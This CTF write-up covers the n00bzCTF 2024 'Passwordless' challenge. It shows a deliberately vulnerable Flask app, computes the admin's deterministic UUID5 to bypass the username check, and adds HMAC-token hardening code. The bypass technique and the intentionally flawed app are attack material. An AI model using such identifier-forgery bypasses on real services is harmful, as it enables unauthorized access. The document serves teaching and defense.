2024 n00bzCTF

writeup web

Challenges

Passwordless

Tired of storing passwords? No worries! This super secure website is passwordless!


For this challenge, we had to exploit a weakness in how the application identifies users.

app.py
#!/usr/bin/env python3
from flask import Flask, request, redirect, render_template, render_template_string
import subprocess
import urllib
import uuid
global leet

app = Flask(__name__)
flag = open('/flag.txt').read()
leet=uuid.UUID('13371337-1337-1337-1337-133713371337')

@app.route('/',methods=['GET','POST'])
def main():
    global username
    if request.method == 'GET':
        return render_template('index.html')
    elif request.method == 'POST':
        username = request.values['username']
        if username == 'admin123':
            return 'Stop trying to act like you are the admin!'
        uid = uuid.uuid5(leet,username) # super secure!
        return redirect(f'/{uid}')

@app.route('/<uid>')
def user_page(uid):
    if uid != str(uuid.uuid5(leet,'admin123')):
        return f'Welcome! No flag for you :('
    else:
        return flag

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)

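Looking at the source, the flag can be retrieved via the user_page() route. The route compares the UID from the URL path to the UUID5 of 'admin123' computed under the hard-coded namespace leet. The POST handler refuses the username 'admin123', but user_page() never checks how the UID was obtained, and UUID5 is deterministic: the same namespace and name always produce the same UUID. Since both values are in the source, we can compute the admin UID ourselves.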

Solution

In a Python terminal…

>>> import uuid
>>> leet=uuid.UUID('13371337-1337-1337-1337-133713371337')
>>> str(uuid.uuid5(leet, 'admin123'))
'3c68e6cc-15a7-59d4-823c-e7563bbb326c'
>>>

Now that we have our target UID, let’s send it to the route: http://127.0.0.1:1337/3c68e6cc-15a7-59d4-823c-e7563bbb326c


Voila! We have our flag: n00bz{f4k3_fl4g_f0r_t35t1ng}
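
Why the UID checked in user_page() is not a secret, and one way to harden it, as an added example that is not part of the original writeup or the challenge's code: uuid5 is rebuilt from its RFC 4122 definition to show that no secret enters the computation, then replaced by an HMAC token under a server-side key. SERVER_KEY, uuid5_by_hand, issue_token and is_admin_token are hypothetical names introduced here.

```python
import hashlib
import hmac
import secrets
import uuid

# Namespace taken from app.py above.
LEET = uuid.UUID('13371337-1337-1337-1337-133713371337')


def uuid5_by_hand(namespace: uuid.UUID, name: str) -> uuid.UUID:
    """uuid.uuid5 rebuilt from RFC 4122: SHA-1 over namespace bytes + name,
    truncated to 16 bytes, with the version and variant bits forced.
    Every input is public, so the output is predictable by anyone."""
    digest = bytearray(hashlib.sha1(namespace.bytes + name.encode()).digest()[:16])
    digest[6] = (digest[6] & 0x0F) | 0x50  # version nibble = 5
    digest[8] = (digest[8] & 0x3F) | 0x80  # RFC 4122 variant bits = 10
    return uuid.UUID(bytes=bytes(digest))


# Assumption: a per-deployment secret. Generated at import for this demo;
# a real service would load it from protected configuration.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(username: str, key: bytes = SERVER_KEY) -> str:
    """Keyed identifier: HMAC-SHA256 of the username under a server-only key."""
    return hmac.new(key, username.encode(), hashlib.sha256).hexdigest()


def is_admin_token(token: str, key: bytes = SERVER_KEY) -> bool:
    """Constant-time check. Both sides are encoded to bytes first because
    hmac.compare_digest raises TypeError on non-ASCII str input."""
    expected = issue_token('admin123', key)
    return hmac.compare_digest(token.encode(), expected.encode())


if __name__ == '__main__':
    # The hand-built value matches the library: nothing secret is involved.
    print(uuid5_by_hand(LEET, 'admin123') == uuid.uuid5(LEET, 'admin123'))
    # A token minted with the server key passes; one minted with a guess fails.
    print(is_admin_token(issue_token('admin123')))
    print(is_admin_token(issue_token('admin123', key=b'attacker guess')))
```

The keyed token only makes the identifier unforgeable without the key; it does not add authentication, so the admin identity still needs a real login step in front of it.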